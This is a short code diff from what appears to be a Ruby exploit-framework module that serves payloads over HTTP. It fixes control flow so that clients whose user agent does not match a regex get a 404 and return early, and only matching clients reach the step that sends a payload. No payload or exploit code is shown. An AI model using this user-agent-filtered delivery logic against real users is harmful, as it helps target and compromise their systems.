@@ -42,7 +42,7 @@ module HTTP
 
     unless user_agent =~ agent_regex
       print_status("Sending 404 to #{client}")
-      send_not_found(cli)
+      return send_not_found(cli)
     end
 
     print_status("Sending payload to #{client}")
